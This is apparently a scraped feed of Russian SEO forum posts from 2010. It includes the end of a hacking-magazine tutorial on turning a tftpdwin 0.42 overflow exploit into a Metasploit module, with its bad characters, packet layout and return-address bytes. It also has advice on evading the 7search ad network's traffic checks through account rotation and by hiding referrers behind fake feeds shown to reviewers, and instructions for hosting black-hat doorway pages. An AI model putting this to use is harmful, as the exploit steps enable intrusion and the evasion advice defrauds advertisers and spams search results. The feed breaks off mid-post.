Запускаем msfconsole и работаем в интерактивной консоли Metasploit'а!<br />Экслоит за 5 минут</p> <p>Как видишь, разработать эксплоит для Metasplot не так сложно. Скорее даже наоборот, ведь большая часть работы уже сделана за тебя. Взять хотя бы огромную базу шелл-кодов — попробуй разработать свой. Но лени человеческой нет предела, поэтому в стремлении еще больше упростить процесс был разработан пакет утилит MSF eXploit Builder. Программа имеет удобный графический интерфейс и поможет по-настоящему быстро создавать новый модуль для Metasploit. Кроме удобного GUI, eXploit Builder включает в себя целую кучу полезных тулз, необходимых для отладки и тестирования эксплоитов. Более того — можно опять же не создавать с нуля, а портировать уже существующие сплоиты.</p> <p>Предлагаю взять какой-нибудь эксплоит и с помощью MSF eXploit Builder превратить его в Metasploit-модуль. Ты спросишь, зачем это нам надо? Превратив его в Metasploit-модуль, мы можем использовать его вместе с различными payload-ами. Проще говоря, это сделает эксплоит более универсальным и кроссплатформенным. Сейчас ты сам убедишься, насколько эта программа может упростить жизнь — ведь теперь для написания и отладки эксплоита не нужно даже знание Ruby и Metasploit API. В качестве кролика для эксперимента я выбрал первое, что попалось, — сплоит для tftpdwin 0.42 (milw0rm.com/exploits/7452).</p> <p>Запускаем MSF eXploit Builder, заходим в меню «Editor» и выбираем «New». Появляется окно с несколькими вкладками (Information, Badchars, Analysis, Shellcode, Design). Переходим на вкладку «Information» и видим много интересных полей. Как ты помнишь, в этой секции указываются цели (OS + SP) и тип/протокол эксплоита (например, remote/tcp). Более того, программа предоставляет нам возможность тестирования и отладки полученного эксплоита, поэтому тут же можно выбрать исполняемый файл и указать параметры для его запуска (порт, ip-адрес).</p> <p>Итак, выбираем наш tftpd.exe, после чего утилита предложит следующие действия на выбор: запустить приложение, запустить его под отладчиком или не запускать вообще — просто запустим приложение. Обрати внимание, что справа сбоку отобразится список загруженных приложением DDL'ек. Теперь начинаем смотреть код сплоита — на наше счастье он предельно понятный. Комментарий «Restricted chars = 0x00 0x6e 0x65 0x74» явно указывает на запрещенные символы — что ж, выставим их в нашей программе. Для этого переходим на вкладку Badchars и в одноименном поле вводим: \x00\ x6e\x65\x74. Далее по коду мы видим, как формируется ядовитый пакет:</p> <p>my $packet = (($p1).($nopsled).($shellcode).(($overflow)).($ret).($p2));</p> <p>Разбираемся с каждой составляющей и заодно составляем буфер для отправки во вкладке «Design». Сначала идет переменная $p1 (my $p1=«\x00\x01»;). Вводим их в поле Value (Operation по умолчанию оставляем RAW). За ней идет переменная $nopsled (my $nopsled = «\x90» x 10;) — выбираем Operation = NOP и устанавливаем длину в 10. Далее располагается $shellcode — устанавливаем Operation = PAYLOAD и Length = 0. Следующая часть — $overflow (my $overflow = “\x41” x $len; строка из символов «А» длиной в $len). Переменная my $len = (274 — length($shellcode)), то есть строка длиной 274 символа минус длина шеллкода. Выставляем Operation = RAW, Length = 274 и выбираем (нажимаем поочередно) вверху кнопки RAW could be: rand_text_alpha, -payload. encoded.length, что означает: длина строки будет высчитываться по вышеприведенной формуле. Потом добавляем адрес возврата $ret (my $ret = “\x5d\x10\x40”) и выбираем Operation = RET. Наконец, добавляем $p2, равное «\x00\x6e\ x65\x74\x61\x73\x63\x69\x69\x00», и выбираем Operation = RAW. </p> <p>Ядовитый пакет готов. Собственно, теперь у нас есть все для создания готового сплоита. Поэтому нажимаем на кнопку «Generate» и любуемся кодом получившегося сплоита. Если какие-то моменты вызывают сомнения, тут же можно отредактировать код вручную. Классно, что возможно сразу проверить работоспособность кода — для этого смело жмем кнопку «Test». И ведь — все работает! За 5 минут, которые ушли на ознакомление с программой, и без всякого знания, как языка Ruby, так и структуры Metasploit, мы создали полностью рабочий сплоит. Это дорогого стоит! В качестве домашнего задания попробуй с помощью MSF eXploit Builder создать эксплоит для нашего сервера :).<br />Заключение</p> <p>Вот и закончилась наша экскурсия по фабрике эксплоитов. Знать, как устроены сплоиты, полезно во многих отношениях. Не умея прочитать шелл-код в свежем эксплоите или, вообще, запуская непонятный exe'шник, далеко не всегда можно доверять его создателю. Многие сплоиты выпускаются в паблик с отсутствующими частями и специально оставленными ошибками — это непременно остановит армию скрипткидис, но для понимающего человека едва ли станет серьезной задачей. Надеюсь, я сегодня убедил тебя, что ничего нереального в сплоитах нет: ведь хакеры люди — логичные и понятные :). <br />Info<br />Подробная информация об Metasploit API: wwwmetasploit.com/documents/api/msfcore/index.html.<br />Блог Metasploit Framework: blog.metasploit.com.<br /></p> <p>Статья по доработке эксплоита: en.wikibooks.org/wiki/Metasploit/WritingWindowsExploit.<br />Видео, показывающее, как создать Portable-версию Metasploit для размещения на флешке: wwwwonderhowto.com/how-to/video/how-to-createametasploitmeterpreterexecutablefile-263017.<br />Старые (и соответственно уязвимые) версии программ всегда можно найти на oldapps.com и oldversion.com.<br /><br /></p> <p><a href="http://www.xakep.ru/" rel="nofollow" target="_blank">http://www.xakep.ru/</a></p> mybb@mybb.ru (reaktor) Sun, 30 May 2010 16:17:17 +0400 http://realseo.mybb.forum/viewtopic.php?pid=22#p22 http://realseo.mybb.forum/viewtopic.php?pid=20#p20 <p>Поиско&#769;вая оптимиза&#769;ция (англ. search engine optimization, SEO) — комплекс мер для поднятия позиций сайта в результатах выдачи поисковых систем по определенным запросам пользователей. Обычно, чем выше позиция сайта в результатах поиска, тем больше заинтересованных посетителей переходит на него с поисковых систем. При анализе эффективности поисковой оптимизации оценивается стоимость целевого посетителя с учетом времени вывода сайта на указанные позиции и Конверсия сайта, на который привлекаются целевые посетители.<br />Основные направления работы</p> <p>Поисковая система учитывает следующие параметры сайта при вычислении его релевантности (степени соответствия введённому запросу):<br />плотность ключевых слов, сложные алгоритмы современных поисковиков позволяют производить семантический анализ текста, чтобы отсеять поисковый спам, когда ключевое слово встречается слишком часто.<br />индекс цитирования сайта, зависящий от количества и авторитетности веб-ресурсов, ссылающихся на данный сайт; многими поисковиками не учитываются взаимные ссылки (друг на друга). Зачастую также важно, чтобы ссылки были с сайтов схожей тематики, что и оптимизируемый сайт.</p> <p>Соответственно, все факторы, влияющие на положение сайта в выдаче поисковой системы, можно разбить на внешние и внутренние. Работа по оптимизации включает в себя работу с внутренними факторами (находятся под контролем владельца веб-сайта) — приведение текста и разметки страниц в соответствие с выбранными запросами, улучшение качества и количества текста на сайте, стилистическое оформление текста (заголовки, жирный шрифт), улучшение структуры и навигации, использование внутренних ссылок, а также внешними факторами — обмен ссылками, регистрация в каталогах и прочие мероприятия для повышения и стимулирования ссылаемости на ресурс. Лицо, проводящее работу по оптимизации веб-сайтов, называется оптимизатор. (регистрация в каталогах с каждым днем все больше и больше утрачивает свой смысл)</p> <p>История</p> <p>Вместе с появлением и развитием поисковиков в середине 1990-х появилась и оптимизация. В то время поисковики придавали большое значение тексту на странице, ключевым словам в мета-тегах и прочим внутренним факторам, которыми владельцы сайтов могли легко манипулировать. Это привело к тому, что в выдаче многих поисковиков первые несколько страниц заняли мусорные сайты, что резко снизило качество работы поисковиков и привело многих из них к упадку[источник не указан 364 дня]. С появлением технологии PageRank больше веса стало придаваться внешним факторам, что помогло Google выйти в лидеры поиска в мировом масштабе, затруднив оптимизацию при помощи одного лишь текста на сайте.</p> <p>Однако оптимизация развивается вместе с поисковиками, и в современных результатах поиска можно видеть всё больше и больше коммерческих сайтов с искусственно раздутой популярностью, особенно по коммерчески привлекательным запросам.</p> <p>Методы оптимизации</p> <p>Методы оптимизации можно разделить на два класса, однако последние события в мире поисковых систем дают понять, что это разделение весьма условно — любая манипуляция определёнными параметрами сайта может быть расценена поисковиком как крайне нежелательное влияние на его результаты. Так, любая попытка манипулирования поисковыми результатами прямо запрещена в лицензии на использование поисковой системы «Яндекс».</p> <p>Белая оптимизация<br />Основная статья: Белая оптимизация</p> <p>Белой оптимизацией, или естественной оптимизацией, называется оптимизаторская работа над ресурсом без применения официально запрещённых каждой поисковой системой методов раскрутки ресурса — без прямых попыток влияния на поисковые алгоритмы сайтов, или проще говоря естественным путем. Это включает в себя работу над самим сайтом, а именно над внутренней навигацией и содержимым, и работу с внешней средой сайта, то есть продвижением оптимизируемого сайта путем обзоров, пресс-релизов, регистрации в социальных закладках, партнерских программ и т. п. с указанием ссылок на сайт. Следует отметить, что «Яндекс» предупреждает о том, что если какой-либо метод оптимизации не является официально запрещенным, это не значит, что его можно применять.</p> <p>Серая оптимизация</p> <p>К серой поисковой оптимизации можно отнести, например, добавление большого количества ключевых слов в текст страницы. Зачастую в ущерб читабельности для человека (масло масляное, потому что в нем есть маслопроизводные масляные жиры). Или дорвей без редиректа (когда при попадании на дорвей не происходит автоматического перенаправления на продвигаемый сайт). Серая оптимизация отличается от черной, тем, что она официально не запрещена, но её использование может быть расценено как неестественное завышение популярности сайта. Некоторые поисковые системы, например, Яндекс могут временно или постоянно заблокировать такой сайт. То есть конечное решение о том, является ли методы продвижения законными или нет, принимает специалист, а не автоматика.</p> <p>Чёрная оптимизация<br />Основная статья: Чёрная оптимизация</p> <p>Способами чёрной оптимизации являются использование дорвеев (страниц и ресурсов, созданных специально для роботов поисковых систем, зачастую с большим количеством ключевых слов на странице), приём под названием клоакинг (пользователю отдаётся одна страница, читабельная, а поисковому роботу — другая, оптимизированная под какие-либо запросы), использование скрытого текста на страницах сайта, использование «однопиксельных ссылок».</p> mybb@mybb.ru (reaktor) Sun, 23 May 2010 21:08:05 +0400 http://realseo.mybb.forum/viewtopic.php?pid=20#p20 http://realseo.mybb.forum/viewtopic.php?pid=19#p19 <p>В этом топике будет база знаний косательно чарджбеков и банов со стороны 7серч, отчего они происходят и как максимально обезопаситься от проблемм с этим фидпровайдером. Если кому-то будет что добавить по теме - отписывайте пожалуйста в топике. Думаю всем эта информация будет полезна, а многим съэкономит много-много зеленых денег на чарджах и фильтрах от 7серч и отчасти других фидпровов, которые могли бы случиться, но не случатся, т.к. вы заведомо предупреждены </p> <p>Итак:</p> <p>1) Во первых первое и основное правило - не ленитесь пожалуйста время от времени в мемберке сравнивать выдачу на своем аккаунте по вашим рабочим тематикам с максимальной выдачей по системе. Для этого спецально есть утилита Qoute Keywords, где по вашему айди отображается именно ВАША выдача, а не неизвестно-как-достижимый-максимум как у других ппц. Если биды просели - стучите в саппорт и смело просите новый аккунт, либо пробуйте менять домен (если биды просели именно на домене, вы так же это можете проверить в Qoute Keywords), либо меняйте субаккунты, иногда фильтры стоят например на 0ой субакк, а на 1ом субакке аккаунта биды в разы выше. Вобщем со сменой акков если нужно у нас проблемм нет </p> <p>2) Второе железное правило - в 50% случаев, если вы не читер, смена аккаунта поможет. Банально возмжно при валидации вашего аккаунта на стороне 7серч вы попадетесь на другого проверяющего которому (в отличии от предидущего) покажется что ваш траф соответствует их нормам. Поэтому если вы точно не уверены что ваш траф они принимать не будут, мы бы советовали пробовать менять акк 2-3 раза. Первый раз при смене аккаунта у вас шанс втесаться 50%, второй раз 25%, третий раз 12.5%. Дальше думаю пробовать уже бесполезно. Но по желанию опять же. </p> <p>3) Далее что важно. У 7серч есть 4 вида фильтров. Первый - они отключают вам часть выдачи на своей стороне, не предупреждая нас. Второй - вас просто просят от них отключить. Третий - вас просят отключить и за вас недоплачивают небольшой чарджбек. Четвертый - вас просят отключить и за вас недоплачивают ВСЮ сумму которую вы заработали на 7серч за последний месяц скажем. Подробнее про каждый:</p> <p>Первый - регулярная проверка своих бидов через Qoute Keywords и смена акка-домена в этом случае вас спасет.</p> <p>Второй - ничего страшного не произошло, тупо меняйте аккаунт и пробуйте слать дальше, 50% что второй раз вас уже не закроют. Если есть возможность что-то улучшить в трафе - это приветствуется и увеличивает ваш шанс &quot;подружиться&quot; с 7серч. Причина такого закрытия 7серч может быть любой, но как правило не особо страшной. Скорее всего какой-то индус-проверяющий пришел в плохом настроении, или на трафе проскочило чуток ботов, или что-то еще подобное.</p> <p>Третий - раз за вас сделали чардж, значит вы скорее всего уже неугодили чем-то посерьезнее. Или боты злостные проскочили, а скорее всего кто-то из покупателей вашего трафа накатал на вас абузу и потребовал вернуть деньги, либо качество трафа сильно испортилось вдруг, либо какие-то недоброжелатели вам подмешивают говнеца в траф со стороны. В этом случае рекомендуем подумать над своим трафом, что-то исправить, стукнуть в наш саппорт за рекомендациями к исправлению и все же попробовать поменять акк, включить хмл защиту.</p> <p>Четвертый - если невыплатили всю сумму - скорее всего абуза на вас была очень серьезной, или кто-то из покупателей вынюхал какой-то &quot;нелегал&quot; запрещенный правилами 7серч в вашем трафе, либо очень сильно испортилось качество вдруг (либо и было изначально очень плохим). Совет - сначала в саппорт за рекомендациями к исправлению качества, посидеть подумать что можно сделать самому и только потом проба смены аккаунта.</p> <p>Еще важно как долго вы на этом трафе с 7сер работали. Если работали год скажем и вдруг вас закрыли - проблеммы вообще нет, они и дальше будут принимать ваш траф, никаких глобальных изменений правил и норм на их стороне не происхоит уже Бог знает сколько. Просто или вы наткнулись на вредного рекламодателя, или боты проскочили опять же. Смена акка поможет 70%. Я в асе помогу 99%&#160; (если смена акка не прокатит).<br />Если же вы какой-то новый траф пытаетесь втиснуть к 7серч, то тут сложнее. Будут или нет принимать станет ясно после 3ей смены акка. С 3го раза не удалось - не удастся в этом уж месяце точно, а через месяцок можно еще попробовать&#160; Ну или траф улучшить. </p> <p>4) Не ленитесь стучать саппортам с вопросом &quot;меня закрыл 7серч, как вы думаете что мне исправить в трафике, чтобы такого не повторилось?&quot; Часто бывает что вам скажут например &quot;У вас только 70% трафа поддерживют JavaScript, а это значит 29% трафа - боты&quot;. Поможет банальный джаваскрипт редирект. Или &quot;У вас 30% кликов с одного айпи (одной подсети)&quot; Поможет закрыть эту подсеть. Ну и тд.</p> <p>5) Вообще говоря заранее настроенные фишки против ботов и статистика на своей стороне часто спасает от проблемм. Кое-что на тему борьбы с ботами можно найти здесь: <a href="http://seoshare.com/showthread.php?t=5412" rel="nofollow" target="_blank">http://seoshare.com/showthread.php?t=5412</a></p> <p>6) Если меняете айди, меняйте домены, иначе толк от смены айди снижается в два раза. Если у вас серьезные проблеммы с 7серч, рекомендуем еще и примелькавшиеся дизайны фидов поменять.</p> <p>7) 7серч недолюбливает когда на аккаунте много европейского трафа и мало штатов и канады, особенно штатов. Поэтому старайтесь держаться хотябы соотношения 50/50. Половина англоговорящих, половина европы и стран 3го мира. Англичане тоже прокатывают за хороший траф. Вообще говоря проблемма я думаю связана с особенностями проверки трафика на стороне 7серч, их система проверки плохо адаптирована под серферов не владеющих в достаточной мере английским языком. Отсюда и все проблеммы. У остальных фидпровов нет таких заморочек с европой.<br />Если у вас банально нет достаточного кол-ва англоговорящего трафа чтобы замиксовать его в общую кучу, ничего страшного, это еще не означает что 7серч вас 100% закроет, просто их требования к качеству будут немного выше на вашем трафе чем на соседнем англоговорящем. Грубо говоря с ваших серферов они будут ждать 10 продаж из 1000 серферов, а на соседнем англоговорящем прокатило бы за минимум и 7 продаж. Так что пробовать можно всегда. Но если 7серч закрыл вас за европу, больше 2-3х раз менять акк я бы не советовал (по крайней мере в этом месяце&#160; ). Если 3ий раз закрыавает уже, т.е. закрывает по факту - систематически, то и дальше закрывать будет. В этом случае либо работаем без 7серч (на европу вообще говоря у них биды в разы хуже чем у других фидпровов, так что много не потеряем, но опять все надо пробовать, бывают и исключения), либо пытаемся поменять аккаунт чуть позже.</p> <p> Старайтесь не смешивать на одном аккаунте трафик нескольких направленностей. Всегда лучше разделять. Фарму к фарме. Адалт к адалту. Казино к казино и тд. Нужное количество акков в саппорте вам всегда выдадут. Лучше иметь 3 аккаунта средних объемов с разделением трафа по тематикам на них, чем один где все в куче. Особенно опасно мешать фарма трафик с адалтом. Это самая ядреная смесь.</p> <p>9) Старайтесь слать трафик с фидов. Т.е. чтобы в реферах которые будет видеть 7серч были ваши фиды, а не урлы дорвеев или другие ресурсы. Особых потерь вы от этого не получите, но простой редирект с дора на фид всегда можно сделать. Либо встроить ифреймом фид в дорвей, либо джаваскриптом вставить. Главное чтобы проверяющие на стороне 7серч видели именно фид. Это повысит траст вашего аккаунта. Всегда лучше когда траф идет с ресурса </p> <p>my-best-pharmacy.com/search.php?q=viagra <br />чем тот же траф с ресуса <br />sdfls.ph132.net-dot.edupharma.edu/cgi/snd?viagra</p> <p>сконвертится траф одинаково, а вот ко вторым реферам будет намного больше подозрений чем к первым</p> <p>10) Старайтесь чтобы названия фидов были тематичными вашему трафику. Шлете фарму - делайте фиды с фарма именами. Шлете адалт - фиды с адалт именами. Шлете казино - казиношные названия и т.д. Старайтесь избегать &quot;сложных&quot; путей на доменах фидов. Пусть и тематичный, но сложны путь такого рода например врятли будет приветствоваться 7серч &quot;best-pharmacy.com/xvffb-dirrectory/net-klkvip/gosearch.php?q=viagra&amp;my-klikvip-saff=123&amp;dofilter=17-29&amp;comgs=dkfsdl&quot;. Я не говорю что такой траф не примут, примут его, но при росте оборота особенно вероятность того что на ревалидации к вам будут незаслуженно (в плане качества трафа) придераться выше чем на &quot;красивых доменах&quot;.</p> <p>11) Всегда делайте индекс страницы у фидов, либо с индекса пусть редиректит на серч страницу с пустым запросом. ОБЯЗАТЕЛЬНО пустым! Никаких редиректов сразу на сладкие киворды типа tramadol или buy viagra. 7серч это очень не любит. Важно что когда проверяющий 7серч откроет урл вашего фида (без параметров, просто имя домена откроет) он увидет выдачу, а не парковочную страницу, непонятную ошибку или вообще пустоту. Проверяющие 7серч чекают содержимое фидов время от времени и могут быть вопросы если там не будет выдачи</p> <p>12) Бывает что дурную службу сослужит черезмерное выделение выдачи. Например слишком яркое выделение первой позиции выдачи или слишком агресивное выделение. Вообще говоря выделять что-то в выдаче можно и это действительно увеличивает доход, но старайтесь делать это в пределах разумных норм.</p> <p>13) Если у вас была проблемма с субаккаунтом, а особенно на него прислали чардж, имейте ввиду что могли упасть биды и на других субаккаунтах, даже если там был хороший траф. Это недавняя фишка 7серч, раньше такого не было. Поэтому если вы заметили понижение профита после бана 7серчем одного из субакков, совет тот же - смена аккаунта и доменов. Хотя зачастую достаточно бывает просто поменять субаккаунт, перекинуть тот же траф на новый субакк.</p> <p>14) Принцип работы 7серч примерно следующий. Вы начинаете слать траф - вас проверяют первые 3 дня, потом время от времени делают ревалидацию плюс постоянно следят не упал ли глобально в качестве ваш траф. Поэтому особенно важно чтобы первые дни работы все в порядке было с трафом. Точно известно что 7серч автоматически делает ревалидацию трафа ближе к $500/дейли оборота, ближе к $1000/дейли и $1500/дейли. Причем чем больше вы делаете дейли, тем более притязательную и детальную ревалидацию они делают (логично), в процессе которой могут всплыть факты на которые при мелких оборотах они закрывали глаза. Поэтому если у вас дохренища трафа, не советую кичится этим и радоваться смотря на себя в ТОП1, если только вы не уверены что траф у вас действительно очень хороший. Иначе логичнее разбить траф по тематикам на несколько аккаунтов, и иметь скажем 3 акка с оборотм $1000/дейли чем висеть в ТОП1 с 3к/дейли. Но дело впринципи ваше, многие висят и ничего&#160; Если что-то будет не так все равно вопросы с такими крупными аккаунтами, если есть проблеммы с 7серч, могут довольно оперативно решаться через меня в индивидуальном порядке, за счет мозгодельни 7серчу.</p> <p>...И еще к слову об этом вы всегда можете разбивать даже однотипный трафик по нескольким аккаунтам, если вас это сильно не напрягает. Так безопаснее. Даже если нежданно негаданно негодавание 7серч обрушится на один из акков, остальне останутся нетронутые и на время решения вопроса можно на них перекинуть траф. Плюс всегда можно чекать профит на всех 3х акках и следить чтобы везде был одинаковый средний бид и выхлоп, если где-то просел, значит проблемма с акком, и можно его сменить.</p> <p>15) Старайтесь избегать &quot;любопытних кликов&quot; в вашем трафе. Например у вас траф адалт, а вы на своем фиде повесите в релейтед или рецент серчи киворды viagra, levitra, cialis. Многие серферы будут кликать туда из любопытства, но само собой ничего не покупать. А поскольку тематика дорогая - она требует отдачи в виде продаж, которых нет. В итоге на вас может придти абуза от покупателей такого &quot;любопытствующего&quot; трафика. &quot;Любопытные&quot; клики прокатывают в тематиках где все зависит не от продаж а от сайнапов например или просто серфинга. Например адалт датинг прокатит на адалт трафе, покер прокатит на казино трафе и тд. Т.е. не сильное изменение тематики допускается впринципи, никто за это не бьет.</p> <p>16) Никакой дополнительной софт-рекламы на фидах. За это 7серч закрывает сразу же. Доп. рекламу вешать на фиды можно, но там не должно быть софта и всего что с ним связано.</p> <p>17) Старайтесь чтобы у вас в реферах светился киворд по которому делается клик. Всегда лучше чтобы рефер был в стиле my-feed-domain.com/search.php?q=viagra или my-feed-domain.com/123/viagra.html<br />чем такой my-feed-domain/click.php или такой my-feed-domain/search.php. В первом случае может вызвать подозрение название редирект скрипта click.php. Не все подумают что он нужен для джаваскрипт редиректа, борьбы с ботами или безреферными кликами. Если уж шлете через джаваскрипт редирект, то лучше так my-feed-domain/search-go.php?q=keyword (с указанием киворда и имя скрипта более дружественное). Второй случай (my-feed-domain/search.php) вообще говоря нормальный и многие так работают, но просто совет добавить туда еще и киворд, работы на 5 минут, а траст у фидпровайдеров вы себе поднимете этим</p> <p>18 ) Если вам все же пришел чарджбек, но его сумма мала по сравнению с вашим оборотом, то вообще не стоит даже начинать волноваться. 99% что это просто нехороший рекламодатель, которому вернули деньги после того как он вынес мозг саппорту (они блин такое вовсю практикуют&#160; ). Это не значит что у вас появились какие-то фильтры на этого фидпрова, не значит что он отключился, не значит что нужно менять акк или домен.<br />НО если чарджбек большой, в этом случае совет все же искать причины в трафе, стукнуть за советом в саппорт и поменять айди и домены</p> <p>19) Небольшое техническое разяснение по кликвипу. Чарджбеки часто делаются с указанием акка, субакка или домена в коментарии. Если указан акк это значит чарджбек за этот акк сняли с другого вашего аккаунта, т.к. на этом денег уже нет. Если указан субакк, значит претензия именно к этому субаккаунту. На него лучше траф не лить. Если указан домен, и чарджбек небольшой - ничего страшного, просто они уточнили по какому домену чарджбек (они нам прислали значит не по айди а по доменам список). Если указан домен и чарджбек большой (например вся сумма слитая с этого домена) то домен лучше поменять, значит с ним проблеммы.</p> <p>20) Если все же 7серч неустанно банит вас, подумайте о том чтобы работать без него. Зачастую его выдача составляет менее 15% от общей и потеря этого фидпрова на заработок существенно не повлияет. Все зависит от тематики трафа, все надо пробовать </p> <p>21) Если у вас &quot;особенный&quot; трафик, вероятность что вас будут принимать у 7серч падает. однако некоторых &quot;особенных&quot; он с радостью принимает. тут я думаю дело в том как &quot;особенность&quot; реализована. наиболее распостраненная причина бана такого трафика - парни в 7серч получают абузу непосредственно от серфера.</p> <p>22) Забыл добавить самую частую причину проблемм&#160; Если вы как-то шаманите на своем трафе, домешивайте там автоклик или говнеца какого-то, то на чарджбеки и падения условий работы - без обид. Значит не прокатило&#160; Вообще как показывает практика лучше не шаманить, очень редко прокатывает. Это как казино. Можно и выиграть, но чаще проигрываешь </p> <p>23) Еще одна фишка. Если у вас например НЧ траф, но для доп. прибыли вы выставляете на фиде ссылки в стиле Buy Viagra где-нибудь рядом с выдачей и эти ссылки видут на выдачу по соответствующему фарма запросу - 7серч скорее всего такой фарма траф принимать не будет (даже если у вас с него раньше были продажи). Причина проста - люди на них как правило кликают из любопытства, следовательно уровень продаж такого трафа на порядок ниже чем с чистого фарма трафа, поэтому 7серч такое дело банит. Не всегда сразу, но банит. Обидно что если вы такой &quot;любопытный&quot; фарма трафик смешиваете с вашим основным НЧ трафом, то под раздачу п*лей пойдет и основной траф. Посему как уже говорилось выше - разделяйте траф по тематикам, дабы возможные проблеммы с одной тематикой не затронули другую.</p> <p>24) Если вы используете JavaScript фид или gFeed (графический), то 7серч бывает более притязательный к такому трафу. однако спасает прослойка, в этом случае, используя настройку &quot;слать через свой кликовый скрипт&quot; в JavaScript фиде, вы как бы прячете от фидпровайдеров реальные урлы где располагается выдача, в реферах остается домен через который идет траф (домен где установлена прослойка), а на этом домене стоит &quot;искуственный&quot; фид. В gFeed 2.0 аналогичная прослойка задумана изначально, единственное что вам нужно включить ее в конфиге скачиваемых из мемберки скриптов. Подробнее можно почитать в соответствующих разделах мемберки.</p> <p>25) На ваших фидах должна быть выдача 7серч когди их проверяющие придут посмотреть откуда к ним идет трафик. Если вы поставили выдачу, слили трафа, а потом поставили на это место адсенс например, через пару дней 7серч проверяющий пришел, увидел что выдачи там нет, удивился и на всякий случай забанил вас. Так они бывает делают.</p> <p>26) не используйте адалт-домены для фарма трафика. сразу закроют. траф должен идти с нейтральных либо тематичных имен доменов, слать же с адалт доменов фарма запросы - гарантированный бан 7серчем.</p> <p>27) профилактически можно сразу закрыть у себя и не слать на нас страны третьего мира, в стиле бывшего ссср, африканских и тд. как показывает практика много на них не заработаешь, а вот 7серч они очень не любы.</p> <p>28 ) лучше если на ваших источниках (реферы которые видят фидпровайдеры) будут фиды, а не гостевые которые вы заваливаете блоками рекламы с помощью графического и джаваскрипт фидов. Проверяющие 7серч заходят по реферам время от времени, увидимв там нормальную &quot;классическую&quot; выдачу успокаиваются и уходят. Поэтому всегда лучше использовать прослойку для джаваскрипт и графического фидов, в ней уже встроена замена рефера, проверяющие будут видеть рефером домен на котром стоит прослойка, а зайдя на этот домен увидят мини-фид (сделан в прослойке спецально для них). Вобщем использование прослойки снижает риск бана 7серчем.</p> <p>Ко всему хотелось бы еще добавить что мы как правило оповещаем тикетами в мемберке если у вас субакк или аккаунт закрыл 7серч + скоро будет новая тулза за счет которой это все будет видно в риал-тайм режиме (на этой неделе).</p> <p>Все что еще будет вспоминаться или выясняться на тему чарджбеков, фильтров и защиты от всего этого я буду дописывать в этом топике, что и вам советую</p> mybb@mybb.ru (reaktor) Sun, 23 May 2010 20:58:39 +0400 http://realseo.mybb.forum/viewtopic.php?pid=19#p19 http://realseo.mybb.forum/viewtopic.php?pid=18#p18 <p>И так – дорвей мы создали и нужно его где-то разместить в Интернете. Денег на покупку домена и хостинга под него у нас естественно нет – поэтому едиственный выход фрихосты (место под ваши “сайты” выделяется бесплатно). Как их найти – опять таки – Google в помощь – вводим запрос free hosting и перебираем вslfxe – нас интересуют хостинги где дается возможность заливать свои файлы по фтп. первое подобное что мне встретилось – byethost.com. Регистрируемся. </p> <p>Username – вводим имя пользователя созвучное с нашим кейвордом – к примеру если кей по которому сделан дор Sale dog – то выбираем имя к примеру sale-dog (некоторые фрихостинги не воспринимают знак тире – поэтому часто приходится словосочетания вводить слитно).</p> <p>Password – ясно – пароль</p> <p>Email Address – выш почтовый ящик, как правило под каждый дорвей, на одном фрихостинге, нужен новый е-mail – идеально подходят почтовые ящики от gmail.com – они принимаются практически на всех фрихостингах, всякие mail.ru и им подобные ящики – головнгая боль – то не принимаются, то не приходят письма с фрихостов.</p> <p>Site Category – берите Personal</p> <p>Site Language – естественно английский</p> <p>Enter Security Code – введите код из поля Security Code</p> <p>Жмем Register – вводим ответ на простенькое арифметическое уравнение (так сказать защита от автоматического создания аккаунтов на фрихостинге).</p> <p>В Control Panel – данные на доступ в аккаунт фрихостинга – нас сейчас мало интересуют – можете в принципе покопаться</p> <p>Files and FTP Settings – вот то что нас сейчас интересует – данные на ftp. FTP-менеджеров существует множество – самый простой встроен в Total Commander который установлен практически у каждого. Находим в нем раздел FTP и создаем новое подключение куда вводим данные ftp фрихостинга</p> <p>Заголовок – вводим имя соединения – любое</p> <p>Имя сервера – берем из FTP host name фрихостинга – т.е. ftpbyehost32.com</p> <p>Учетная запись – данные из FTP user name</p> <p>Пароль на вход – FTP password</p> <p>Соединяемся и видим примерно такую картину:</p> <p>Тут нам явно указали что не стоит заливать сюда файлы – идите в папку htdocs<br />Здесь вам подсказывается какой урл вашего фрихостинга – т.е. username.byegost32.com (он также указан ранее – на картинке выше – Domain name – но почему-то полностью не отобразился) – можете зайти по данному урлу в браузере и увидеть примерно такое:<br />Эта страница – index.htm (я ее немного “подправил”) который мы видим по ftp. Удаляем его в Total Commander-е и заливаем файлы дорвея который мы ранее сгенерировали с помощью DPW. Заходим снова по урлу нашего дорвея и если все правильно то вас сразу должно средиректить на фид партнерки по данному кейворду. Но зайдя на username.byegost32.com вас будет редиректить только по одному урлу – из index.html – но вы же залили не одну страницу – значит попробуйте зайти на другие страницы – username.byegost32.com/vasha-stranica.html – вас должно отправить на фид партнерки уже по другому кейворду (сорри – склероз – давно не использовал данный дорген) – по кейворду который вы указали при генерации дорвея. Попробуйте позаходить на другие страницы этого же дорвея – должно редиректить на фид по этому же кейворду.&#160; <br />Этот фрихост я привел в качестве примера – часто от выбора фрихостинга зависит и положение в поисковиках – одни поисковики могут любить данный фрихостинг, другие могут не выводить его в топ никогда – тут уж методом перебора выбирайте. Параметров по которым можно судить стоит ли заливать дорвеи на данный фрихостинг множество – для начала просто проверьте есть ли он вообще в индексе поисковика – например введите в Google запрос site:byegost32.com – что ничего нету? Так и нечего с данным фрихостингом мучаться (я специально его выбрал чтобы не угробить кому-то хороший фрихостинг – если бы я привел нормальный – то хлынувшая волна дорвейшиков быстро его угробила бы, да и сегодня один фрихост хорош, а завтра полностью может вылететь из выдачи поисковика). Ищем другой фрихост – регистрация и параметры ftp на нем естественно будут отличаться – но принцип тот же – тренируйтесь, ищите. Также учтите, что хозяин фрихостинга в любой момент может удалить ваши дорвеи – тут уж ничего не поделаешь.<br />Tags: Black+SEO, Black+SEO:+Заливка+дорвеев+на+фрихостинг</p> mybb@mybb.ru (reaktor) Sun, 23 May 2010 20:53:55 +0400 http://realseo.mybb.forum/viewtopic.php?pid=18#p18 http://realseo.mybb.forum/viewtopic.php?pid=15#p15 <p>Сегодня я хочу посветить эту статью вопросу – “Добавил пост, что дальше?”. Видел много подобных постов на блогах, однако хотелось бы написать, что нужно делать, как считаю я. Это достаточно простые, однако достаточно повторяющиеся действия, которые могут надоесть. Но я считаю, что это обязательные действия, после добавления статьи в ваш блог. Ну теперь начну:</p> <p>1) Добавление в соц. закладки. Пусть вы будете говорить, что это не приносит ни ссылок, ни трафика, однако в гугле при помощи одних соц закладок и грамотной оптимизации текста можно выйти в топ10 и без внешних ссылок, по запросу частотой не выше 1000. Поэтому я считаю этот процесс обязательным. Его можно довести до автоматизации при 